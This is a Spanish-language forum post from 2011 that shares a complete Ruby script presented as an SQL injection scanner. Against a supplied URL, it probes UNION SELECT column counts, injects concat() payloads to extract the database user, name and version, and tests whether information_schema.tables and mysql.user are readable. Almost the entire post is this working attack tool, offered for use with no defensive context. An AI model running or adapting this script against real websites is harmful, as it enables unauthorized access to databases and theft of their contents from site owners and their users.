[Ruby] SQLI Scanner

Iniciado por BigBear, 7 Octubre 2011, 01:32 AM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Un scanner de SQLI en ruby

Código (ruby) [Seleccionar]

#!usr/bin/ruby
#SQLI Scannerl (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'


def uso
 print "\n[+] sqli.rb <site>\n"
end

def toma(host,path)
 http = Net::HTTP.new(host,80)
 return http.get(path).body
end

def details(web,more)
web1 = more.sub(/hackman/,"0x4b30425241")
more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
print "\n\n[+] Extrating information of the DB\n\n"
url = URI.parse(web)
code = toma(url.host,url.path+"?"+url.query+more)
if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
 print "[username] : "+$1+"\n"
 print "[database] : "+$2+"\n"
 print "[version] : "+$3+"\n\n"

test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

if test1=~/K0BRA/
 print "[information_schema.tables] : ON\n"
end

if test2=~/K0BRA/
print "[mysql.user] : ON"
end


else
 print "\n[-] Not Found\n\n"
end
end


def scan(web)
print "\n[+] Testing the vulnerability SQLI...\n\n"
url = URI.parse(web)
codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
if codetest=~/The used SELECT statements have a different number of columns/
 print "[+] SQLI Detected\n\n"
 else
 print "[-] Not Vulnerable to SQLI\n\n"
 copyright()
end

z = "1"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
#print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
if code=~/K0BRA(.*?)K0BRA/
print "[+] The Page has "+num+" columns\n"
print "[+] The number "+$1+" print data\n\n"
z = z.sub($1,"hackman")
print "[SQLI] : "+web+"-1+union+select+"+z
details(web,"-1+union+select+"+z)
copyright()
end
end
print "\n\n[-] Not Found the numbers of the columns\n\n"
copyright()
end

def head()
 print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright()
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0]
 uso()
else
 scan(ARGV[0])
 copyright()  
end
copyright()